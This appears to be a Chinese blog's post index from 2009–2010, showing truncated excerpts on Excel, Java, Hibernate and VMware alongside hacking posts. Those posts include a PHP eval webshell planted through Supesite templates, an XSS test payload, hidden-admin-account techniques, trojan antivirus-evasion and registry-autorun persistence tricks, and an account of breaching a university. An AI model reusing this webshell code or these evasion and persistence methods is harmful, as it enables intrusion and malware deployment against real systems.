- 博客(144)
- 问答 (1)
- 收藏
- 关注
RSS订阅原创 超简单下载方法----下载一切视频
你能找到在线观看地址吧?其实下载视频和音频文件根本不用软件根本不用刻意的去下载,方法简单的让人看了都直发笑,只是有的朋友不知道而已,在试看视频或试听音频文件等缓冲完后,这时候想文件已经下载到我们电脑里了,下载网页里的和暴风影音酷我音乐盒QQ空间等等方法完全一样,下面我说一下怎么下载音频或视频文件:1:打开浏览器或某个网页后, 选择:工具-internet选项-删除文件-确定。(这样做...
2010-11-29 16:15:45
1175
原创 Excel制作斜线表头的制作
在报表里面制作斜线表头是中国人特有的习惯,遗憾的是Excel并没有直接提供对这一样式的良好支持,所以本技巧将介绍一些方法,尽可能完美地解决这个问题。 1 单线表头 如果表头中只需要一条斜线,可以利用Excel的边框设置来画斜线,然后填入文字内容。在单元格内画斜线的方法如下。选定单元格,按<Ctrl+1>组合键调出“单元格格式”对话框。在“单元格格式”对话框的“边框”选项...
2010-06-17 03:58:28
467
原创 excel斜线表头的制作
内容提要:本文介绍excel斜线表头的制作方法,并给出实例讲解。 Excel中,如何制作复杂的斜线表头?斜线表头,就是包含有斜线和文字的单元格。IT部落窝给出方法,让学习者少走弯路。利用直线和文本框工具,不管多复杂的斜线表头,我们只要掌握了方法,都能迎刃而解。 首先,我们给出所要制作的统计表,如下图所示。 第一步,输入除了斜线以外的单元格的内容,并调整行列,编辑排版好,...
2010-06-17 03:56:42
270
利用google对特定站点进行测试的实现
利用google照样可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。 ------------------------------------------------首先用google先看这个站点的一些基本情况(一些细节部分就略去了): site:xxxx.com 从返回的信息中,找到几个该校的几个系院的域名: http//a1.xxxx.comhttp//a2....
2010-03-18 23:12:15
232
Ascii 代码表
Ascii 代码表 Ascii 0 {Nulo, Sem Som} Ascii 1 Ascii 2 Ascii 3 Ascii 4 Ascii 5 Ascii 6 Ascii 7 Ascii 8 {BackSpace} Ascii 9 {Tab} Ascii 10 Ascii 11 Ascii 12 Ascii 13 {Enter} Ascii 14 Ascii 15 Ascii 16 {Shif...
2010-03-16 11:49:07
540
js 字符ascii码转换函数
js 字符ascii码转换函数 字符转ascii码:用charCodeAt();ascii码砖字符:用fromCharCode(); 看一个小例子<script>str="A";code = str.charCodeAt(); str2 = String.fromCharCode(code);str3 = String.fromCharCode(0x60+26);...
2010-03-16 11:47:19
236
[转载]入侵复旦大学
此文章已发表在《黑客X档案》第6期杂志上后经本文作者hackest提交到HST技术论坛欢迎大家转载,但请务必要记住注明此信息! 一、师出有名某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他提议说不如我们黑掉复旦吧。正好当时也比较清闲,就答应一起看看了,嘿嘿。这次跑去黑复旦纯粹是为了练习技术。二、战略部署这次要拿的是复旦...
2010-03-09 23:17:43
181
15款最好的Windows系统安全检测工具
你想测试你的Widnows系统的安全性吗? 如果你选对了工具,其实这是一件非常有趣的工作。如果你正为挑选合适的工具而苦恼,那就让本文给你一些帮助吧。 关于安全测试工具,我发现大体上你都能购买到。然而,还有一些是免费的工具,没有这些工具我会举步维艰,所以我将两种类型的工具一同与你分享。 基于Widnows平台的电脑,有7类常见的安全测试工具,它们是: 1. 端口扫描 (Port s...
2010-03-09 23:04:07
511
系统中多种隐藏超级用户方法
一、如何在图形界面建立隐藏的超级用户 图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为Windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。XP中regedit...
2010-03-09 23:00:54
127
追捕技术:让黑客无处可逃[转载]
网络是个大舞台,这个舞台中不光有安全人员也有黑客份子所组成。芳击与防守自然就成了两者之间相互论辩的话题。对于一些重要的部门,一旦网络遭到攻击,如何追踪网络攻击,追查到攻击者并将其绳之以法,是十分必要的。下面的文章分本地追踪和网络追踪两部份。 本地追踪方法 追踪网络攻击就是找到事件发生的源头。它有两个方面意义:一是指发现IP地址、MAC地址或是认证的主机名;二是指确定攻击者的身份。网络攻...
2010-03-06 21:24:04
184
玩黑朋友的博客
1. http://w0w.cz.cc/read.php/40.htm#entrymore 2. 友情检测中国红客联盟webshell并提权 http://www.nhs8.com/post/1532.html 3. http://www.enterer.cn/ 4. 过瑞星主动的批处理,比较恶毒http://www.darkst.com/b...
2010-03-05 18:09:15
109
Sablog-X v2.x 任意变量覆盖漏洞
Sablog-X v2.x 任意变量覆盖漏洞author: 80vul-Bteam:http://www.80vul.com一 描叙:由于Sablog-x v2.x的common.inc.php里$_EVO初始化处理存在逻辑漏洞,导致可以利用extract()来覆盖任意变量,最终导致xss、sql注射、代码执行等很多严重的安全漏洞。二 分析commo...
2010-03-02 09:44:47
296
Supesite7后台拿shell方法
方法:编辑模板的时候写入这几行,拆开写一句话,就行了. <!--{eval $content = "@eval(\$_POST[c])";}--> <!--{eval $test1 = "<"."?"."php ".$content."?>";}--> <!--{eval fputs(fopen(S_ROOT
2010-03-01 01:31:48
263
asp记录管理员账号密码
在一次安全检测中,其实已拿到了webshell了,但是我还要社工他的邮箱还有其他资料类,所以要得知道他的习性。下载了数据库,但是md5密码没办法解密。唉,看来只要记录他的登录管理员 账号密码了!省得还要去穷取法破解!这个密码其实说重要也不重要 说不 重要 其实很重要。因为很多人喜欢使用相同密码。即使是我这类安全检测人员,也免不了使用同一种账号密码的习惯。首先看看他的后台登陆代码&l...
2010-03-01 01:30:45
435
原创 711企业网站管理程序V6.0再爆上传漏洞及利用
前些天出了个Cookies注入漏洞,今天又翻了看了下~ 在ADMIN目录有2个上传文件upfile.asp和upfile2.asp 这2个组件的功能就是:无需登录后台,无需截包,直接本地修改代码就能上传asp文件,无语中。。。。 另外,更可爱的是写这套程序的还为我们编写一套可用万能密码直接登录的后台。据谷歌报道,存在此套系统的用户多达1,050,000 。继续无语中。。。 ...
2010-03-01 01:28:44
285
blogbus.com(博客大巴)XSS跨站漏洞
漏洞测试过程: 1.申请了一个帐号 2.进入后台--博客--模板--首页布局设置--文章内容[编辑] 3.在对话框中的编辑链接处加上跨站代码或进入文章发布 切换编辑器至HTML模式 4.测试代码 <script>alert(/http://hi.baidu.com/5427518/)</script> <iframe src=http://hi.bai...
2010-03-01 01:25:45
327
webshell
百科名片顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。 产品及服务 一方面,webshell可以被站长常常用于网站管理、服务器管理等等。 根...
2010-02-23 14:27:26
149
原创 MyEclipse中SVN的安装
MyEclipse 6.X6.x的操作比较简单,可通过官方提供的链接,利用MyEclipse内置的Find and Install功能来安装。1. 打开Myeclipse,在菜单栏中选择Help→Software Updates→Find and Install; 2. 选择Search for new features to install,点击Next进入下一步; 3...
2010-01-29 10:42:58
104
原创 完美镜像ISO制作工具WinIso-----使用说明
WinISO是一款ISO文件制作和编辑软件,它可以对以前只能望之兴叹的ISO光盘镜像文件进行编辑,可以处理包含引导信息的镜像文件。它是一款共享软件,目前的最新版本是5.3版,工具在本文后面的附件中,可以放心下载使用。就以WinISO5.3中文版为例。 下面我们就来介绍一下该软件的使用方法: 1.新建 iso格式文件 单击图1中的“新建”...
2010-01-22 18:03:26
1031
原创 VMware5.5的安装步骤(图)
VMware Workstation 5.5的安装步骤: 图1软件安装界面,软件安装不用费太多的功夫,只要按照顺序点击下一步安装即可。安装后启动程序,便出现如下界面图2。 图2点击文件——新建——虚拟机,然后按照以下步骤操作。 图3创建虚拟机的向导,帮助你配置你的虚拟系统的参数(比如硬盘、内存、网络的设置等等) 图4选择虚拟系统文件的兼容格式(新手推荐选择默认选项) 按...
2010-01-22 16:16:26
500
原创 免---杀过2010主动和行为的方法
第三代杀软的主动和行为厉害的没法说,其实不少大牛其实都找到了方法。只是没放出来,小凉谭通过小熊的指引说是一个bat就能搞定。机缘巧合,在登录97ai。com的时候发现他上面有个网址发部器,一看当然知道是木马啦 ,就下了下来是个exe的自解压,拿到虚拟机上解压了一下,发现释放了四个文件,一个是快播的播放器,一个是木马,一个是名为setup.bat的文件,一个是名为setup.vbs的文件,看了一下啊...
2010-01-21 13:35:43
184
原创 JAVA的单例设计模式
public class Book{ private static Book book; private Book(){ } public static Book getBook(){ if(book == null){ return new Book(); } return book; }} 单子(单例)模式,顾名思义,...
2010-01-20 17:30:46
74
原创 [转载]hibernate的优点
文章只是让大家认识一下Hibernate的优势和未来,有没有必要学习要看你的实际需求,不过还是建议你在有时间的情况下研究一下,如果能用到项目当中那更好。如果你的基础还没有牢固,请你三思而行。 Hibernate FAQ 初学者必读! 1、Hibernate是什么? Hibernate是一个优秀的开发源代码的Java对象持久层轻量级封装框架,它既可以用来在Java应用程序中取代大部分JDBC代码,也...
2010-01-20 17:21:50
89
原创 [转载]史上最简单的Hibernate入门
其实Hibernate本身是个独立的框架,它不需要任何web server或application server的支持。然而,大多数的Hibernate入门介绍都加入了很多非Hibernate的东西,比如: Tomcat, Eclipse, Log4J,Struts, XDoclet, 甚至JBoss。这容易让人产生Hibernate复杂难懂的误解,特别是打击了初学者的积极性。在这篇文章将不涉及E...
2010-01-20 17:17:44
74
原创 防范黑客入住系统建立隐藏帐户
面对黑客在自已的电脑中建立一个隐藏的账户,用户应该怎么办?虽然账户隐藏技术可谓是最隐蔽的后门,一般用户很难发现系统中隐藏账户的存在。其实只要用户细心观察做到以下几点,即能发现其中的奥妙。 把“隐藏账户”请出系统 隐藏账户的危害可谓十分巨大。因此我们有必要对防范技术作一个了解,把隐藏账户彻底请出系统 1、添加“$”符号型隐藏账户 对于这类隐藏账户的检测比较简单。一般黑客在利用这种方法建立完隐藏账户后...
2010-01-19 10:21:46
190
原创 MySql外键关联Foreign key及error 1452
今天往MySQL的一张表里插记录时,出现一个错误提示:ERROR 1452 : Cannot add or update a child row: a foreign key constraint fails。。。。 仔细观察后才发现该表中有一字段是外键,它参照了另外一张表的主键。出现错误的原因是:插入外键的数据在另一张表的主键中不存在。 解...
2010-01-15 15:18:56
351
原创 JFileChooser文件类型gif和jpg的过滤
import java.awt.*;import java.awt.event.*;import javax.swing.*;import javax.swing.filechooser.*;import java.io.File;public class test extends JFrame { private static final long serialVer...
2010-01-13 21:42:23
493
原创 Applet画图修改中。。。
效果如下图: import java.applet.Applet;import java.awt.BasicStroke;import java.awt.Button;import java.awt.Canvas;import java.awt.Choice;import java.awt.Color;import java.awt.Cursor;import ...
2010-01-13 21:00:59
132
原创 Applet画图程序
双击右键才显示功能菜单。。。 import java.applet.Applet; import java.awt.BasicStroke; import java.awt.Button; import java.awt.Canvas; import java.awt.Choice; import java.awt.Color; import java.awt.C...
2010-01-11 14:18:06
324
原创 强烈推荐一款非常好用的java反编译工具----纯净,绿色,营养,健康
一款非常好用的java反编译工具----纯净的,绿色的,营养的,健康的。 目前,支持到JDK1.6,不会出现乱码,如:this$0 jad和DJ Java Decompiler反编译的工具,我也试了,可能对JDK1.6支持不够吧,编译后有乱码,如:this$0但,Java Decompiler这款工具没这问题,不足是反编译后注释没有喽。。。 谁用谁知道啊。...
2010-01-11 13:17:21
154
原创 bat的写过瑞星2010主动防御的方法
[Version] Signature="$WINDOWS NT$" [DefaultInstall.Services] AddService=inetsvr,,My_AddService_Name [My_AddService_Name] DisplayName=Windows Internet Service //服务名Description=Provides to the...
2010-01-05 00:51:43
140
原创 十六进制转成十进制
String s = "7a"; int i = Integer.parseInt(s, 16); long l = Long.parseLong(s, 16); 如果是十六进制的字符串要转换为十进制的字符串,那也可以用上面的办法,再接个toString就行: String s = "7a"; String s1 = Integer.toString(Integ...
2010-01-04 14:13:10
132
原创 绕过主动防御的代码注入方法思考
目前大多数的杀软都是hook NtWriteVirtualMemory和NtUserSetWindowsHookAW、NtUserSetWindowsHookE来防止代码注入。关于代码注入Ring3层的方法主要有:l 远程线程CreateRemoteThreadl 消息钩子SetWindowsHookExl Ring3 APC QueueUserApcl 修改线程上下文SetC...
2010-01-04 00:26:26
269
原创 过主动防御的有效方法
一般的木马运行添加自启动就会被杀毒软件的主动防御或者360拦截,前几天在网上发现了几个注册表自启动的方法,效果还不错,也算是目前主动防御的一大死角了,连微点竟然也拦截不到。 1.cmd运行前执行的程序(被动启动)HKEY_CURRENT_USERSoftwareMicrosoftCommand Processor AutoRun REG_SZ "xxx.exe" 2.session m...
2010-01-04 00:18:54
385
原创 [转载]免杀之个人经验总结
1.比如你定位一个特征码定位到了一个字符串上我们比如这个特征码定位到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,遇到这个我想大家一定是修改大小写吧,但是有时候修改大小写还是被杀。 这个我们可以怎么办呢,我们可以移动位置,因为这个肯定是一个api函数的参数,我们找到那个函数然后修改下调用地址就行了。 所以有时候...
2010-01-02 22:20:27
328
原创 经验总结木马免杀方法总结篇
一.入口点加1免杀法:1.用到工具PEditor2.特点:非常简单实用,但有时还会被卡巴查杀3.操作要点:用PEditor打开无壳木马程序,把原入口点加1即可二.变化入口地址免杀法:1.用到工具:OllyDbg,PEditor2.特点:操作也比较容易,而且免杀效果比入口点加1点要佳.3.操作要点:用OD载入无壳的木马程序,把入口点的前二句移到零区域去执行,然后又跳回到入口点的下面第三句继续执行...
2010-01-02 22:14:45
1522
2
原创 转:免杀技术经验总结[20081215更新]
学习免杀,首先你得学会汇编把,基础的指令要懂得一些,一般的指令修改必须会,一般的修改这里就不赘述了,接下来就是掌握一些常用的免杀技巧,这里总结一些 第一:我们学习免杀的方向:只是为了保护自己的黑软的话!就不会学的那么累(没必要去学汇编编程)有时候简单加下壳或者脱下壳就OK!如果是要挑战世界的杀毒软件的话,毕竟每个PC用户安装的杀软都不一样!想抓鸡拿服务器的朋友就要进修脱壳破解,高级汇编的内容了,这...
2010-01-02 22:12:10
323
原创 想过主动哟
一、改字符串系统芯片----我爱的心物理内存---智脑内心 Windows版本----xiaojun型号Windows目录----xiaojun路径注册公司-----我的女人注册用户---我的玫瑰------------------------主动特征码:0009F4E3_00000002当前用户----现在的你当前日期----现在日子开机时间----恋爱时候计算机名称---我的爱人是窗口分辨...
2010-01-02 17:49:43
93
原创 Tomcat启动时自动加载Servlet
想实现这样的功能: 1. Tomcat启动时随即启动Servlet; 2. Servlet启动时定时执行一个任务。 要点: 1。Tomcat中启动Servlet时,只需要在Servlet所在的工程的配置文件web.xml中写成如下即可; <servlet> <servlet-name>...
2009-12-31 11:29:08
134
原创 轻轻松松将web工程制作成exe安装包的工具--------smart install maker
smart install maker是一款傻瓜式的非常小巧的程序安装工具,它可以将一些文件轻松打包成安装软件,比如绿色非安装版的软件我们可以用这款工具轻松地搞成一款安装软件。 网上有个汉化新世纪的,汉化作品不错,但插件超多,而且他们的软件都是安装版的。我们可以先将他们的软件先安装,然后把插件去除后再用这款smart install maker打包成安装版的软件。最新版...
2009-12-28 17:14:53
667
空空如也
applet中画出的图形如何保存为jpg格式的图片
2009-10-26
TA创建的收藏夹 TA关注的收藏夹
TA关注的人